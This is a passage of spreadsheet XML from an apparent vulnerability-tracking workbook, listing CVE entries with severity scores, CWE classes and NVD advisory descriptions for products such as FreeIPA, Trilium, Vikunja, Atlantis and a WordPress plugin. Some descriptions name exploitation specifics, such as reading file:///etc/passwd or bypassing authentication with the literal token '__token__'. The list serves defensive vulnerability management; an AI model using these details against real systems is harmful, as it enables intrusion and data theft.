        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr"/>
      <c r="Q351" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-193</t>
        </is>
      </c>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in D-Link DIR-605 B1v202WWB03. This issue affects the function tunnel_set_params of the file progs.gpl/pppd.alpha/l2tp/tunnel.c of the component L2TP Control Message Parser. Such manipulation of the argument peer_hostname  leads to off-by-one. The attack may be performed from remote. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="S351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86297</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18147</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr"/>
      <c r="Q352" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in FreeIPA. An unauthenticated remote attacker could exploit a DOM Cross-Site Scripting (XSS) vulnerability in the FreeIPA/IdM Web UI password reset page. By enticing a victim to click a specially crafted link and complete a password reset, the attacker could inject and execute arbitrary JavaScript code. This allows the attacker to perform actions within the victim's authenticated session, potentially leading to full administrative control if an IdM administrator is targeted.</t>
        </is>
      </c>
      <c r="S352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18147</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32257</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr"/>
      <c r="Q353" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. Prior to 1.2.13, custom CSS supplied through the Brand Settings Styles field by a backend user with the backend.manage_branding permission is compiled by the LESS parser and rendered without sanitization on every backend page, allowing stored cross-site scripting against backend users. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="S353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32257</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32258</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr"/>
      <c r="Q354" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. From 1.2.10 through 1.2.12, authenticated backend users with the backend.manage_editor permission can store custom Markup Styles that are compiled by the LESS parser and rendered without sanitization on every backend page, allowing stored cross-site scripting. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="S354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32258</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50979</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr"/>
      <c r="Q355" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>A command injection vulnerability in the 'advanced/curl' component of Osbil Technology oPanel v1.19.50 and earlier allows authenticated attackers to execute arbitrary shell commands via the 'url' parameter</t>
        </is>
      </c>
      <c r="S355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50979</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53580</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr"/>
      <c r="Q356" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-552, CWE-73</t>
        </is>
      </c>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions prior to 0.104.0, the automatic image-download feature accepts file:// URLs in a note's img tags and reads the referenced local file with no path validation, allowing any authenticated user to disclose arbitrary files readable by the Trilium process. When a text note is saved, Trilium scans its HTML for image sources and downloads each external one; because the HTML sanitizer keeps file as an allowed scheme, a source such as file:///etc/passwd is passed straight to a filesystem read and its contents are stored as a note attachment the user can then retrieve. Pointing the same primitive at an unbounded source such as /dev/zero causes uncontrolled memory allocation that crashes the server process. The feature is enabled by default and is reachable through the web UI, the ETAPI, the web clipper, and note imports, requiring only an authenticated session or an ETAPI token. This issue is fixed in version 0.104.0</t>
        </is>
      </c>
      <c r="S356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53580</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55065</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr"/>
      <c r="Q357" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. From 0.24.6 until 2.4.0, DELETE /api/v1/projects/:project/views/:view permits an authenticated user to supply a view identifier from another project while authorizing only against an attacker-controlled project identifier. ProjectView.CanDelete in pkg/models/project_view_permissions.go does not establish that the view belongs to the path project, and ProjectView.Delete in pkg/models/project_view.go continues after the scoped project_views delete affects no rows. Its subsequent deletes select task_buckets and task_positions only by project_view_id, allowing cross-tenant destruction of Kanban assignments and ordering while leaving the victim view and tasks intact. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="S357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55065</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55228</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr"/>
      <c r="Q358" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, the REST API did not properly enforce the scope of project- and workspace-scoped teams, allowing a user to submit invalid team configurations through the API. By assigning projects to a team via these unvalidated requests, a user could grant access to projects they were not authorized to see or manage. This could expose private projects and permit translation, repository, and project-management operations outside the user's intended permission scope. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="S358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55228</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64679</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr"/>
      <c r="Q359" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>Atlantis is a self-hosted golang application that listens for Terraform pull request events via webhooks. From 0.19.8 until 0.45.0, Atlantis does not consistently validate user-controlled workspace values supplied through accepted repository-level atlantis.yaml configuration or authenticated /api/plan input before joining them into local workspace paths. Traversal segments can escape the intended per-pull workspace directory and cause clone preparation or other working-directory code paths to call os.RemoveAll, os.MkdirAll, or related filesystem operations on out-of-bounds directories before Terraform rejects the invalid workspace name. This can create, delete, or reuse writable paths with the privileges of the Atlantis process, causing integrity loss or denial of service. This issue is fixed in version 0.45.0.</t>
        </is>
      </c>
      <c r="S359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64679</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65181</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr"/>
      <c r="Q360" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>Insufficient authorization of Data Source tables in Impala 2.7-4.5 allows a client with privileges to upload a file to remote storage and create a table to execute arbitrary Java code.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="S360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65181</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71809</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr"/>
      <c r="Q361" s="5" t="inlineStr">
        <is>
          <t>CWE-259</t>
        </is>
      </c>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass via Hardcoded Master Verification Code vulnerability in Siam Ordering (siam-server) 1.0.0 allows remote unauthenticated attackers to log in as any user, merchant, or administrator.</t>
        </is>
      </c>
      <c r="S361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71809</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73334</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr">
        <is>
          <t>apache:parquet</t>
        </is>
      </c>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr"/>
      <c r="Q362" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>Potential problem for users of the org.apache.parquet.crypto.keytools package in Apache Parquet, versions 1.12 to 1.18. 
This package enables users to encrypt Parquet files via an envelope encryption mechanism that wraps (encrypts) data keys via a Key Management Service (KMS). 
On the reader side, the KMS URL can be application-controlled or file-controlled.
If the user does not leverage application control for this parameter, a file-controlled KMS URL is forwarded to a pluggable KmsClient implementation. 
If the pluggable implementation does not perform host validation, a KMS token can be sent to a malicious host set by an attacker in the file.
Before the problem is fixed, users are recommended to leverage application control for KMS URL parameter in readers (versions 1.12-1.18).
After the problem is fixed (presumably in version 1.19), the upgrade will disable file-controlled KMS URL by default. Users of the KMS URL parameter 
will have two options then: leverage application control for KMS URL parameter in readers, or enable file-controlled KMS URL (via a new app parameter).
The latter option will explicitly require (in the new parameter documentation) to validate the KMS URL and use authentication in the custom implementation of the KMS client plug in.</t>
        </is>
      </c>
      <c r="S362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73334</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75464</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr"/>
      <c r="Q363" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>OneNav 1.2.4 contains an authenticated arbitrary file deletion vulnerability via import_link().</t>
        </is>
      </c>
      <c r="S363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75464</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76009</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr"/>
      <c r="Q364" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>The Next-Cart Store to WooCommerce Migration plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 3.9.8 via the `NCWM_Kitconnect::run()` function. This is due to the plugin registering the `/wp-json/next_cart/v1/migration` REST route with `permission_callback` set to `__return_true` and relying on a hardcoded fallback value of `__token__` in `get_option('nextcart_token', '__token__')` when the `nextcart_token` option has not yet been written to the database. This makes it possible for unauthenticated attackers to bypass authentication to the migration endpoint by supplying the literal string `__token__` as the token, gaining access to privileged handlers that pass attacker-controlled SQL directly to `$wpdb-&gt;query()` and `$wpdb-&gt;get_results()` — enabling arbitrary SQL execution including administrator account creation — and pass an attacker-controlled path to `unlink()`, enabling arbitrary file deletion and full site takeover. The hardcoded fallback is reachable whenever the `nextcart_token` option has not yet been populated, which occurs after WP-CLI, network, or programmatic plugin activation without a subsequent authenticated `wp-admin` visit, as token generation is deferred to `admin_init` via `register_settings()`.</t>
        </is>
      </c>
      <c r="S364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76009</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77317</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr"/>
      <c r="Q365" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In versions from 3.88 through 4.39, the SFTP server evaluates configured path permissions with a literal string-prefix comparison, so a user scoped to a path is also granted the same access to any sibling path whose name merely begins with the same characters. A user granted access to /tenants/alice therefore also matches /tenants/alice-archive, /tenants/alice2, and similar siblings, because the check does not require a path-component boundary. An authenticated low-privilege SFTP user with a root home directory and narrow path permissions can thereby cross the configured ACL boundary to read another tenant's files, and to overwrite them if granted write, all through the documented SFTP service with its own valid credentials. This issue is fixed in version 4.40.</t>
        </is>
      </c>
      <c r="S365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77317</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77567</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr"/>
      <c r="Q366" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R366" s="5" t="inlineStr">
        <is>
